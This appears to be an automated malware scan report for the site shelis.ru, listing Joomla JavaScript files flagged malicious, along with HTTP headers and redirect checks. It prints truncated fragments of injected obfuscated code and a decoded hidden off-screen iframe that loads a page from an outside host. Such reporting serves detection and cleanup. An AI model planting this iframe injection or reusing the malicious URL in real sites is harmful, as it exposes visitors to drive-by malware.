Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shelis.ru
Result: The website is marked by Google as suspicious — visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious — visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://shelis.ru/ | 200 OK Content-Length: 21198 Content-Type: text/html | clean |
http://shelis.ru/templates/gk_finance_business/js/domready_fix.js | 200 OK Content-Length: 3392 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see the antivirus reports below): (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& ignorUA = true; break; } } return ignorUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? d Antivirus reports:
| ||
http://shelis.ru/media/system/js/modal.js | 200 OK Content-Length: 12689 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://shelis.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 8468 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see the antivirus reports below): (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); ; Decoded script: <iframe src="http://qersmile.jual-bajumurah.com/gweyrtuytgjhfdg17.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe> Antivirus reports:
| ||
http://shelis.ru/components/com_k2store/js/k2store.js | 200 OK Content-Length: 9665 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see the antivirus reports below): (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& data:{"elements":Json.toString(str)}, onComplete: function(response){ SqueezeBox.applyContent(response); if ($(container)) { doMiniCart(); } } }).request(); } else { if (doModal == true) { (function() { document.body.removeChild($('k2storeModal')); }).delay(500); } form.task.value = task; form.submit(); } } Decoded script: <iframe src="http://qersmile.jual-bajumurah.com/gweyrtuytgjhfdg17.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe> Antivirus reports:
| ||
http://shelis.ru/media/system/js/caption.js | 200 OK Content-Length: 4064 Content-Type: application/javascript | clean |
http://shelis.ru/templates/gk_finance_business/js/gk.script.js | 200 OK Content-Length: 8793 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see the antivirus reports below): (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); if (!docMode|| docMode < 8) { container.style.width = width + "px"; } } } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); } Decoded script: <iframe src="http://qersmile.jual-bajumurah.com/gweyrtuytgjhfdg17.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe> Antivirus reports:
| ||
http://shelis.ru/modules/mod_rokslideshow/tmpl/rokslideshow.js | 200 OK Content-Length: 8211 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see the antivirus reports below): (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& Antivirus reports:
| ||
http://shelis.ru/templates/gk_finance_business/js/menu/mega.js | 200 OK Content-Length: 15051 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see the antivirus reports below): (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& } }, itemHideOthers: function (el) { var fakeevent = null if (el && !el.childcontent) fakeevent = {}; var curopen = this.childopen.copy(); curopen.each (function(li) { if (li && typeof (li.status) != 'undefined' && (!el || (li != el && !li.hasChild (el)))) { this.itemHide(li, fakeevent); } },this); } }); gkMegaMenuMoo.implement(new Options);); Antivirus reports:
| ||
http://web.redhelper.ru/service/main.js?c=shelis | 200 OK Content-Length: 2006 Content-Type: application/x-javascript | clean |
http://shelis.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 20731 Content-Type: text/html | clean |
http://shelis.ru/media/system/js/validate.js | 200 OK Content-Length: 6347 Content-Type: application/javascript | malicious |
Malicious code — confirmed by antivirus engines (see the antivirus reports below): (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& el.labelref = label; } }); } if (state == false) { el.addClass('invalid'); if (el.labelref) { $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); }); Decoded script: <iframe src="http://qersmile.jual-bajumurah.com/gweyrtuytgjhfdg17.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe> Antivirus reports:
| ||
http://shelis.ru/index.php?option=com_user&view=login | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 11:43:17 GMT Location: http://shelis.ru/your-details/voyti Server: Jino.ru/mod_pizza Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 445e469d50ffa093bcd646def2033ba9=995d62c3162411ee2aab4ce274f16066; path=/ | clean |
http://shelis.ru/your-details/voyti | 200 OK Content-Length: 25379 Content-Type: text/html | clean |
http://shelis.ru/index.php?option=com_user&view=register | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 11:43:18 GMT Location: http://shelis.ru/your-details/zaregistrirovatsya Server: Jino.ru/mod_pizza Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 445e469d50ffa093bcd646def2033ba9=91c689bf179390d6752c8fec3126ad23; path=/ | clean |
http://shelis.ru/your-details/zaregistrirovatsya | 200 OK Content-Length: 26558 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shelis.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 11:43:13 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 11:43:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 445e469d50ffa093bcd646def2033ba9=161fabdfa853ec7de24a1d8d9e500101; path=/
Set-Cookie: gk_finance_business_tpl=gk_finance_business; expires=Tue, 11-Aug-2015 11:43:13 GMT; path=/
GET / HTTP/1.1
Host: shelis.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 11:43:13 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 11:43:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 445e469d50ffa093bcd646def2033ba9=161fabdfa853ec7de24a1d8d9e500101; path=/
Set-Cookie: gk_finance_business_tpl=gk_finance_business; expires=Tue, 11-Aug-2015 11:43:13 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: shelis.ru
Referer: http://www.google.com/search?q=shelis.ru
Result:
The result is the same as for the first query; no suspicious redirects were found.
GET / HTTP/1.1
Host: shelis.ru
Referer: http://www.google.com/search?q=shelis.ru
Result:
The result is the same as for the first query; no suspicious redirects were found.